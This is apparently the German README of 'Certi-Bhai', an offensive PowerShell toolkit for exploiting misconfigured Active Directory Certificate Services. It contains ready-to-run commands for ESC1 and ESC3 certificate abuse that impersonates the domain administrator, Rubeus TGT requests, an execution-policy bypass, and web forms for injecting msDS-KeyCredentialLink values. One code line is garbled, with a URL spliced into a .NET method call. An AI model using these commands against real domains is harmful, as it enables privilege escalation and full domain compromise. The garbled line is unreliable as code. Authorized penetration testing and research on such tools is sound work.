
AD CS-Ausnutzung – hier kommt der dazugehörige Kram rein
Certi-Bhai ist eine umfassende Sammlung von PowerShell-Exploitation-Tools für Angriffe auf Schwachstellen in Active Directory Certificate Services (AD CS). Dieses Toolkit implementiert verschiedene Eskalationsszenarien (ESCs), die kritische Sicherheitsfehlkonfigurationen in ADCS-Umgebungen demonstrieren.
Active Directory Certificate Services (AD CS) sind oft fehlkonfiguriert, was mehrere Angriffsvektoren schafft. Certi-Bhai bietet praktische Exploitation-Skripte und Hilfsprogramme für Sicherheitstests und Forschung zu häufigen ADCS-Schwachstellen.
Nur verantwortungsvoll und in autorisierten Testumgebungen verwenden.
# Active-Directory-Modul (optional, für erweiterte Funktionalität)
Import-Module ActiveDirectory
Schwachstelle: Zertifikatsvorlagen erlauben die Registrierung mit beliebigen SubjectAltName-Werten (SAN).
Funktionsweise: Erstellt ein Zertifikat, das von einer übermäßig freizügigen Vorlage signiert wird, und ermöglicht so die Identitätsübernahme eines beliebigen Benutzers oder Computers in der Domäne.
Nutzung:
# Zum ESC1-Verzeichnis navigieren
cd ESC1
# Das Exploitation-Skript ausführen
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
-templateName "vuln" `
-altName "administrator" `
-pfxPass "password123"
Parameter:
-subjectName: Vollständiger Distinguished Name (DN) des Zielbenutzers-templateName: Name der verwundbaren Zertifikatsvorlage-altName: Alternativer Name, der angefordert werden soll (Benutzername/Computer)-pfxPass: Passwort für den PFX-ExportAusgabe: Base64-kodiertes PFX-Zertifikat zur Verwendung mit Tools wie Rubeus
Video-Tutorial: https://www.youtube.com/watch?v=l0gMw_mO4dw
Schwachstelle: Zertifikatsanforderungs-Agenten können Zertifikate im Namen beliebiger Benutzer anfordern.
Funktionsweise: Registriert ein Zertifikat als Zertifikatsanforderungs-Agent und fordert anschließend Zertifikate für beliebige Prinzipale an.
Nutzung:
# Zum ESC3-Verzeichnis navigieren
cd ESC3
# Das Exploitation-Skript ausführen
.
\esc3_working.ps1 -templateName "CEOTemplate" `
-target_user "administrator" `
-domain "INDISHELL" `
-pfxPass "password123"
Parameter:
-templateName: Verwundbare Anforderungs-Agent-Vorlage-target_user: Prinzipal, für den das Zertifikat angefordert werden soll-domain: Domänenname-pfxPass: PFX-PasswortAusgabe: Administrator-Zertifikat (PFX) mit Base64-Kodierung
Video-Tutorial: https://www.youtube.com/watch?v=fGjrM-JKnoM
Schwachstelle: Application Policy Injection.
cd CSR_Generate
# Eine Zertifikatsignieranforderung erzeugen
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
-altName "admin"
# CSR an die Zertifizierungsstelle übermitteln
.
\csr_submit.ps1 -csr $csr `
-templateName "User" `
-caServer "ca-server.domain.local"
Die Weboberfläche cert.aspx bietet ein benutzerfreundliches Formular zum Anfordern eines Zertifikats vom AD-CS-RPC-Endpunkt:
http://your-iis-server/cert.aspx
Ändern Sie LDAP-Attribute über die Weboberfläche. Dieses Skript wird im Wesentlichen verwendet, um einen Blob in das Attribut msDS-KeyCredentialLink zu injizieren:
http://your-iis-server/ldap_update.aspx
Funktionen:
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
-templateName "User" `
-altName "administrator" `
-pfxPass "P@ssw0rd!"
# PFX in ein für Rubeus nutzbares Format konvertieren
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap
F: Die Skriptausführung wird blockiert
# PowerShell als Administrator ausführen
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
F: Zertifikatsvorlage nicht gefunden
F: LDAP-Verbindung schlägt fehl
Einen Fehler gefunden oder Verbesserungsvorschläge? Bitte melden Sie diese verantwortungsvoll.